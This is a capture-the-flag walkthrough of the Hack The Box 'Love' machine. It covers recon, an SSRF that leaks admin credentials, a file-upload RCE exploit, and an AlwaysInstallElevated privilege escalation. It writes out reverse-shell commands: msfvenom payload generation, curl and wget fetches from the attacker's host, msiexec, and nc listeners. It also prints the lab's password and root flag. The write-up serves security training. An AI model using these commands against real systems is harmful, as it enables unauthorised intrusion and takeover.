Introduction@Love:~$

Column	Details
Name	Love
IP	10.10.10.239
Points	20
Os	Windows
Difficulty	Easy
Creator	pwnmeow
Out On	01 May 2021

Pwned

root@Love:~# whoami                                                                                                                                   root                                                                                                                                                  root@Love:~# hostname                                                                                                                                 Love                                                                                                                                                  root@Love:~#

Recon

Nmap

# Nmap 7.91 scan initiated Sun May  2 04:03:12 2021 as: nmap -sC -sV -oA nmap/result 10.10.10.239
Nmap scan report for 10.10.10.239
Host is up (0.090s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '10.10.14.27' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/2%Time=608E6AD6%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.27'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m35s, deviation: 4h02m30s, median: 21m35s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-02T02:25:08-07:00
| smb-security-mode: 
|   account_used:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-02T09:25:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May  2 04:03:42 2021 -- 1 IP address (1 host up) scanned in 30.25 seconds

There is lot of ports open.

Let’s first start with port-80

Port-80

There is a login page that need voter id & Password.

Port-80

Let’s use gobuster to find some new directories.

┌───[us-free-1]─[10.10.14.27]─[root@parrot]─[~/Desktop/HTB/Love]
└──╼ [★]$ gobuster dir -u http://10.10.10.239 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.239
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/02 04:06:36 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
/Images               (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
/admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/] 
/plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
/includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
/dist                 (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]    
/licenses             (Status: 403) [Size: 421]                                     
/examples             (Status: 503) [Size: 402]                                     
/IMAGES               (Status: 301) [Size: 338] [--> http://10.10.10.239/IMAGES/]  
/%20                  (Status: 403) [Size: 302]                                     
/Admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/Admin/]   
/*checkout*           (Status: 403) [Size: 302]                                     
/Plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/Plugins/] 
/phpmyadmin           (Status: 403) [Size: 302]                                     
/webalizer            (Status: 403) [Size: 302]                                     
/*docroot*            (Status: 403) [Size: 302]                                     
/*                    (Status: 403) [Size: 302]                                     
/con                  (Status: 403) [Size: 302]                                     
/http%3A              (Status: 403) [Size: 302]                                     
/Includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/Includes/]
/**http%3a            (Status: 403) [Size: 302]

Got a /admin directory let’s check the /admin page.

And page asking for username and password which we don’t have.

Love.htb

Let’s check https port 443.

And it’s Forbidden.

Love.htb

Let’s check port 5000.

And it’s also Forbidden.

Love.htb

If we check https certificate we find a new vhost.

Love.htb

Let’s add this vhost in our /etc/hosts file.

127.0.0.1       localhost
127.0.1.1       parrot

#custom
10.10.10.239    staging.love.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let’s go to staging.love.htb

It’s a free file scanner service.

Love.htb

Let’s check Demo page.

Love.htb

It’s asking for file url. let’s add the localhost url with port 5000 which said for Forbidden.

http://127.0.0.1:5000

Love.htb

And we got the admin creads for voting system.

admin:@LoveIsInTheAir!!!!

Love.htb

Now let’s go to 10.10.10.239/admin which we find with gobuster.

Love.htb

We are inside votingsystem admin panel.

Love.htb

Let’s check on google for any vulnerability in votingsystem.

┌─[puck@parrot-lt]─[/opt]
└──╼ $searchsploit -t voting system
--------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------- ---------------------------------
Online Voting System - Authentication | php/webapps/43967.py
Online Voting System 1.0 - Authenticat | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authe | php/webapps/50088.py
Online Voting System Project in PHP - | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Byp | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (A | php/webapps/49445.py
Voting System 1.0 - Remote Code Execut | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (U | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questio | php/webapps/50052.txt
--------------------------------------- ---------------------------------
Shellcodes: No Results
┌─[puck@parrot-lt]─[/opt]

Link : Voting System 1.0 – File Upload RCE

modify below part

# --- Edit your settings here ----
IP = "www.love.htb" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.10" # Reverse shell IP
REV_PORT = "8888" # Reverse port
REV_PORT = "8888" # Reverse port 
# --------------------------------

INDEX_PAGE = f"http://10.10.10.239/admin/index.php"
LOGIN_URL = f"http://10.10.10.239/admin/login.php"
VOTE_URL = f"http://10.10.10.239/admin/voters_add.php"
CALL_SHELL = f"http://10.10.10.239/images/shell.php"

payload = """

Now let’s check netcat listener.

┌─[✗]─[puck@parrot-lt]─[~/htb]
└──╼ $nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.239] 50767
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>

We got the rev shell now .

Privilege escalation

we observe that the applocker policy is set and only Phoebe and Administrator users are allowed to install MSI files in a specific directory.

get-applockerpolicy -effective | select -expandproperty rulecollections

let’s run winPEAS.

C:\ProgramData>powershell wget http://10.10.14.10/winpeas.exe -outfile winpeas.exe

Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

After running winPEAS we have the Privilege for AlwaysInstallElevated

Link : Always Install Elevated

After reading the article we known that how to privesc.

First we create a rev shell with msfvenom.

┌───[us-free-1]─[10.10.14.27]─[root@parrot]─[~/Desktop/HTB/Love]
└──╼ [★]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.27 LPORT=1337 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
┌───[us-free-1]─[10.10.14.27]─[root@parrot]─[~/Desktop/HTB/Love]
└──╼ [★]$

Now transfer the rev shell into the machine.

curl http://10.10.14.27/reverse.msi -o reverse.msi

now start your netcat listner.

rlwrap nc -nvlp 1337

now paste this both command and then enter and you got the shell as root.

msiexec /quiet /qn /i reverse.msi

Love.htb

Now let’s get the root.txt file.

┌───[us-free-1]─[10.10.14.27]─[root@parrot]─[~/Desktop/HTB/Love]
└──╼ [★]$ rlwrap nc -nvlp 1337
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.239.
Ncat: Connection from 10.10.10.239:59465.
Microsoft Windows [Version 10.0.19042.928]
(c) Microsoft Corporation. All rights reserved.

whoami
whoami
nt authority\system

cd \users\administrator\desktop
cd \users\administrator\desktop

dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Administrator\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
05/01/2021  11:34 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,223,566,848 bytes free

type root.txt
type root.txt
d2c50fc136e5ec7307cdfa7c8f697a41

C:\Users\Administrator\Desktop>

And we pwned it …….

Resources

Topic	Url
Voting System 1.0 – File Upload RCE	https://www.exploit-db.com/exploits/49445
php_reverse_shell_mini.php	https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/minified/php_reverse_shell_mini.php
Always Install Elevated	https://ed4m4s.blog/privilege-escalation/windows/always-install-elevated

This post is licensed

htb-love-nl

Introduction@Love:~$

Pwned

Recon

Nmap

Port-80

Privilege escalation

Resources

Leave a Reply Cancel reply